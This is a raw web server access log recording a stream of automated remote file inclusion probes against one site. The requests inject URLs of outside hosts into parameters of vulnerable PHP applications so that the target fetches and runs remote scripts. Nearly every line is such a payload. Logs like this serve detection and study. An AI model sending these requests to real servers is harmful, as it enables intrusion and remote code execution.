64.113.122.205 - - [25/Feb/2008:04:32:28 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.76.31.154 - - [25/Feb/2008:04:32:45 -0800] "GET /logs/access_071210.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
68.76.31.154 - - [25/Feb/2008:04:32:49 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
68.76.31.154 - - [25/Feb/2008:04:32:50 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
200.111.157.66 - - [25/Feb/2008:04:33:01 -0800] "GET /?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 919 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.161.236.45 - - [25/Feb/2008:04:34:05 -0800] "GET /logs/access_080127.log/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
68.161.236.45 - - [25/Feb/2008:04:34:05 -0800] "GET /?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.0" 200 903 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
68.161.236.45 - - [25/Feb/2008:04:34:06 -0800] "GET /logs/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.0" 200 3925 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
85.214.93.154 - - [25/Feb/2008:04:34:06 -0800] "GET /?mosConfig_absolute_path=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 200 919 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
211.233.19.105 - - [25/Feb/2008:04:34:11 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.toulouseangloexchange.com"
211.233.19.105 - - [25/Feb/2008:04:34:12 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.toulouseangloexchange.com"
65.98.100.202 - - [25/Feb/2008:04:34:13 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://kaizo.hut2.ru/new/ro.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
65.98.100.202 - - [25/Feb/2008:04:34:14 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.toulouseangloexchange.com"
65.98.100.202 - - [25/Feb/2008:04:34:20 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://kaizo.hut2.ru/new/ro.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
65.98.100.202 - - [25/Feb/2008:04:34:21 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.toulouseangloexchange.com"
67.159.30.77 - - [25/Feb/2008:04:35:14 -0800] "GET /claroline/tracking/userLog.php?rootSys=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.toulouseangloexchange.com"
67.159.30.77 - - [25/Feb/2008:04:35:16 -0800] "GET /logs/claroline/tracking/userLog.php?rootSys=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.toulouseangloexchange.com"
68.161.236.45 - - [25/Feb/2008:04:35:27 -0800] "GET /?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.0" 200 903 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
72.36.179.98 - - [25/Feb/2008:04:35:28 -0800] "GET /logs/access_080204.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.179.98 - - [25/Feb/2008:04:35:28 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.179.98 - - [25/Feb/2008:04:35:28 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
91.192.194.37 - - [25/Feb/2008:04:35:39 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
91.192.194.37 - - [25/Feb/2008:04:35:39 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
124.161.97.124 - - [25/Feb/2008:04:35:40 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.233.7.68 - - [25/Feb/2008:04:35:41 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.toulouseangloexchange.com"
211.233.7.68 - - [25/Feb/2008:04:35:41 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.toulouseangloexchange.com"
209.200.246.89 - - [25/Feb/2008:04:35:45 -0800] "GET /logs/access_080204.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.toulouseangloexchange.com"
209.200.246.89 - - [25/Feb/2008:04:35:45 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.toulouseangloexchange.com"
209.200.246.89 - - [25/Feb/2008:04:35:46 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.toulouseangloexchange.com"
72.30.216.91 - - [25/Feb/2008:04:37:56 -0800] "GET /logs/access_071217.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
68.161.236.45 - - [25/Feb/2008:04:38:10 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
85.234.133.173 - - [25/Feb/2008:04:38:13 -0800] "GET /logs/access.log//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.riothost.com/billing/downloads/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.234.133.173 - - [25/Feb/2008:04:38:13 -0800] "GET /logs//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.riothost.com/billing/downloads/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
89.108.66.202 - - [25/Feb/2008:04:39:12 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.111.157.66 - - [25/Feb/2008:04:39:16 -0800] "GET /logs/access_080127.log/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.111.157.66 - - [25/Feb/2008:04:39:16 -0800] "GET /?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 919 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.111.157.66 - - [25/Feb/2008:04:39:18 -0800] "GET /logs/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 3941 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
201.35.66.58 - - [25/Feb/2008:04:39:21 -0800] "GET /payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.113.122.205 - - [25/Feb/2008:04:39:23 -0800] "GET /logs/access_071210.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.36.179.98 - - [25/Feb/2008:04:39:28 -0800] "GET /logs/access.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.200.246.89 - - [25/Feb/2008:04:40:31 -0800] "GET /logs/access.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.toulouseangloexchange.com"
210.114.223.160 - - [25/Feb/2008:04:40:45 -0800] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.toulouseangloexchange.com"
210.114.223.160 - - [25/Feb/2008:04:40:45 -0800] "GET /errors.php?error=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.toulouseangloexchange.com"
91.192.194.37 - - [25/Feb/2008:04:40:54 -0800] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.64.33.241 - - [25/Feb/2008:04:41:14 -0800] "GET /logs/access.log//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
69.64.33.241 - - [25/Feb/2008:04:41:14 -0800] "GET //index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
69.64.33.241 - - [25/Feb/2008:04:41:14 -0800] "GET /logs//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
201.35.66.58 - - [25/Feb/2008:04:41:19 -0800] "GET /logs/access_080127.log/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.248.101.69 - - [25/Feb/2008:04:41:19 -0800] "GET /logs/access_080204.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
89.248.101.69 - - [25/Feb/2008:04:41:20 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
89.248.101.69 - - [25/Feb/2008:04:41:20 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
89.248.101.69 - - [25/Feb/2008:04:41:20 -0800] "GET /logs/access_080204.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
89.248.101.69 - - [25/Feb/2008:04:41:20 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
89.248.101.69 - - [25/Feb/2008:04:41:21 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
201.35.66.58 - - [25/Feb/2008:04:41:22 -0800] "GET /?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 919 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
201.35.66.58 - - [25/Feb/2008:04:41:25 -0800] "GET /logs/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 3941 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.76.31.154 - - [25/Feb/2008:04:42:18 -0800] "GET /logs/access_071022.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
209.31.183.74 - - [25/Feb/2008:04:42:43 -0800] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.31.183.74 - - [25/Feb/2008:04:42:43 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.31.183.74 - - [25/Feb/2008:04:42:43 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.214.93.154 - - [25/Feb/2008:04:43:00 -0800] "GET /logs/access_080127.log/?mosConfig_absolute_path=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.214.93.154 - - [25/Feb/2008:04:43:00 -0800] "GET /logs/?mosConfig_absolute_path=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 200 3941 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.239.78.91 - - [25/Feb/2008:04:43:09 -0800] "GET /logs/access_071224.log/index.php?_REQUEST=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
222.239.78.91 - - [25/Feb/2008:04:43:10 -0800] "GET /index.php?_REQUEST=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
222.239.78.91 - - [25/Feb/2008:04:43:10 -0800] "GET /logs/index.php?_REQUEST=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
69.64.33.241 - - [25/Feb/2008:04:43:19 -0800] "GET /logs/access_071217.log//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
85.214.93.154 - - [25/Feb/2008:04:43:59 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.131.171.231 - - [25/Feb/2008:04:44:03 -0800] "GET /logs/access.log/?cms[support]=1&cms[tngpath]=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.131.171.231 - - [25/Feb/2008:04:44:04 -0800] "GET /?cms[support]=1&cms[tngpath]=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 200 919 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.131.171.231 - - [25/Feb/2008:04:44:04 -0800] "GET /logs/?cms[support]=1&cms[tngpath]=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 200 3941 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.131.171.231 - - [25/Feb/2008:04:44:04 -0800] "GET /logs/access_080107.log/?cms[support]=1&cms[tngpath]=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.31.183.74 - - [25/Feb/2008:04:45:18 -0800] "GET /logs/access_071112.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.31.183.74 - - [25/Feb/2008:04:45:18 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.31.183.74 - - [25/Feb/2008:04:45:18 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.18.58.130 - - [25/Feb/2008:04:45:25 -0800] "GET /logs/access.log//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
67.18.58.130 - - [25/Feb/2008:04:45:25 -0800] "GET //index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
67.18.58.130 - - [25/Feb/2008:04:45:25 -0800] "GET /logs//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
209.31.183.74 - - [25/Feb/2008:04:45:51 -0800] "GET /logs/access_071126.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.239.78.91 - - [25/Feb/2008:04:45:53 -0800] "GET /logs/access_080211.log/?cms[support]=1&cms[tngpath]=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
222.239.78.91 - - [25/Feb/2008:04:45:54 -0800] "GET /?cms[support]=1&cms[tngpath]=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 200 919 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
222.239.78.91 - - [25/Feb/2008:04:45:54 -0800] "GET /logs/?cms[support]=1&cms[tngpath]=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 200 3941 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
222.239.78.91 - - [25/Feb/2008:04:46:48 -0800] "GET /logs/access_080107.log/?cms[support]=1&cms[tngpath]=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
67.18.58.130 - - [25/Feb/2008:04:46:52 -0800] "GET /logs/access_071217.log//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
72.36.179.98 - - [25/Feb/2008:04:46:53 -0800] "GET /logs/access.log/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.179.98 - - [25/Feb/2008:04:46:53 -0800] "GET /index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.179.98 - - [25/Feb/2008:04:46:53 -0800] "GET /logs/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.179.98 - - [25/Feb/2008:04:46:53 -0800] "GET /logs/access_080107.log/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.200.246.89 - - [25/Feb/2008:04:48:06 -0800] "GET /logs/access.log/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.toulouseangloexchange.com"
209.200.246.89 - - [25/Feb/2008:04:48:06 -0800] "GET /index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.toulouseangloexchange.com"
209.200.246.89 - - [25/Feb/2008:04:48:06 -0800] "GET /logs/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.toulouseangloexchange.com"
209.200.246.89 - - [25/Feb/2008:04:48:07 -0800] "GET /logs/access_080107.log/index.php?pageurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.toulouseangloexchange.com"
67.18.58.130 - - [25/Feb/2008:04:48:56 -0800] "GET /logs/access.log//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
67.18.58.130 - - [25/Feb/2008:04:48:56 -0800] "GET //index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
67.18.58.130 - - [25/Feb/2008:04:48:56 -0800] "GET /logs//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
64.22.240.103 - - [25/Feb/2008:04:49:38 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.22.240.103 - - [25/Feb/2008:04:49:38 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
67.18.58.130 - - [25/Feb/2008:04:49:39 -0800] "GET /logs/access_080121.log//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
69.64.33.241 - - [25/Feb/2008:04:50:33 -0800] "GET /logs/access.log//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
69.64.33.241 - - [25/Feb/2008:04:50:34 -0800] "GET //index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
69.64.33.241 - - [25/Feb/2008:04:50:34 -0800] "GET /logs//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
201.35.66.58 - - [25/Feb/2008:04:50:53 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.64.33.241 - - [25/Feb/2008:04:51:22 -0800] "GET /logs/access_080121.log//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
89.248.101.69 - - [25/Feb/2008:04:51:49 -0800] "GET /logs/access.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
89.248.101.69 - - [25/Feb/2008:04:51:54 -0800] "GET /logs/access.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
200.96.247.163 - - [25/Feb/2008:04:51:59 -0800] "GET /logs/access_080127.log/?mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
200.96.247.163 - - [25/Feb/2008:04:51:59 -0800] "GET /logs/?mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 200 3941 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
200.96.247.163 - - [25/Feb/2008:04:52:08 -0800] "GET /logs/access_080127.log/?mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
200.96.247.163 - - [25/Feb/2008:04:52:08 -0800] "GET /logs/?mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 200 3941 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.13.129.226 - - [25/Feb/2008:04:52:53 -0800] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
85.119.152.152 - - [25/Feb/2008:04:53:00 -0800] "GET /logs/appserv/main.php?appserv_root=http://gnome.org.ua//components/com_zoom/classes/iptc//makernotes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
85.119.152.152 - - [25/Feb/2008:04:53:00 -0800] "GET /appserv/main.php?appserv_root=http://gnome.org.ua//components/com_zoom/classes/iptc//makernotes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
74.54.45.2 - - [25/Feb/2008:04:53:02 -0800] "GET /logs/%3Cwbr%20/%3Eaccess.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.54.45.2 - - [25/Feb/2008:04:53:03 -0800] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.54.45.2 - - [25/Feb/2008:04:53:08 -0800] "GET /logs/%3Cwbr%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
